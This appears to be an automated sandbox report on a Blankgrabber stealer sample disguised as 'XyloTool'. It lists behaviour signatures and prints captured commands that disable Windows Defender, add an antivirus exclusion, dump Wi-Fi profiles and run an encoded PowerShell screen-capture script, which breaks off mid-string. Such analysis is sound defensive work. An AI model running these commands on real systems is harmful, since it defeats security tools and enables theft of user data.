Analysis Overview
SHA256
79fe80b6762a5ee29c76185cd062fcf832deb1620f04ddc4de50d3358ca9373f
Threat Level: Known bad
The file XyloTool.rar was found to be: Known bad.
Malicious Activity Summary
Blankgrabber family
A stealer written in Python and packaged with Pyinstaller
Downloads MZ/PE file
Command and Scripting Interpreter: PowerShell
UPX packed file
Loads dropped DLL
Executes dropped EXE
Reads user/profile data of web browsers
Looks up external IP address via web service
Legitimate hosting services abused for malware hosting/C2
Accesses cryptocurrency files/wallets, possible credential harvesting
Event Triggered Execution: Netsh Helper DLL
Enumerates physical storage devices
Uses Task Scheduler COM API
Modifies registry class
Checks processor information in registry
Opens file in notepad (likely ransom note)
Suspicious use of WriteProcessMemory
Enumerates processes with tasklist
Suspicious use of FindShellTrayWindow
Gathers system information
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: GetForegroundWindowSpam
Detects videocard installed
Suspicious behavior: EnumeratesProcesses
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Checks SCSI registry key(s)
NTFS ADS
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-22 19:04
Signatures
A stealer written in Python and packaged with Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blankgrabber family
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-22 19:04
Reported
2024-06-22 19:07
Platform
win7-20240611-en
Max time kernel
121s
Max time network
122s
Command Line
Signatures
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\XyloTool.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\XyloTool.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3052 wrote to memory of 2700 | N/A | C:\Users\Admin\AppData\Local\Temp\XyloTool.exe | C:\Users\Admin\AppData\Local\Temp\XyloTool.exe |
| PID 3052 wrote to memory of 2700 | N/A | C:\Users\Admin\AppData\Local\Temp\XyloTool.exe | C:\Users\Admin\AppData\Local\Temp\XyloTool.exe |
| PID 3052 wrote to memory of 2700 | N/A | C:\Users\Admin\AppData\Local\Temp\XyloTool.exe | C:\Users\Admin\AppData\Local\Temp\XyloTool.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\XyloTool.exe
"C:\Users\Admin\AppData\Local\Temp\XyloTool.exe"
C:\Users\Admin\AppData\Local\Temp\XyloTool.exe
"C:\Users\Admin\AppData\Local\Temp\XyloTool.exe"
Network
Files
C:\Users\Admin\AppData\Local\Temp\_MEI30522\python310.dll
| MD5 | b93eda8cc111a5bde906505224b717c3 |
| SHA1 | 5f1ae1ab1a3c4c023ea8138d4b09cbc1cd8e8f9e |
| SHA256 | efa27cd726dbf3bf2448476a993dc0d5ffb0264032bf83a72295ab3fc5bcd983 |
| SHA512 | b20195930967b4dc9f60c15d9ceae4d577b00095f07bd93aa4f292b94a2e5601d605659e95d5168c1c2d85dc87a54d27775f8f20ebcacf56904e4aa30f1affba |
memory/2700-23-0x000007FEF5D90000-0x000007FEF61F5000-memory.dmp
memory/2700-24-0x000007FEF5D90000-0x000007FEF61F5000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-22 19:04
Reported
2024-06-22 19:15
Platform
win10v2004-20240611-en
Max time kernel
595s
Max time network
625s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\_MEI50922\rar.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\winrar-x64-701.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\XyloTool.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\XyloTool.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\_MEI48362\rar.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\XyloTool.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\XyloTool.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\_MEI78882\rar.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\XyloTool.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\XyloTool.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\_MEI89122\rar.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\XyloTool.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\XyloTool.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\taskmgr.exe | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Local Settings | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Local Settings | C:\Windows\system32\taskmgr.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\Downloads\XyloTool.rar:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| File created | C:\Users\Admin\Downloads\winrar-x64-701.exe:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\XyloTool.exe
"C:\Users\Admin\AppData\Local\Temp\XyloTool.exe"
C:\Users\Admin\AppData\Local\Temp\XyloTool.exe
"C:\Users\Admin\AppData\Local\Temp\XyloTool.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XyloTool.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XyloTool.exe'
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgAC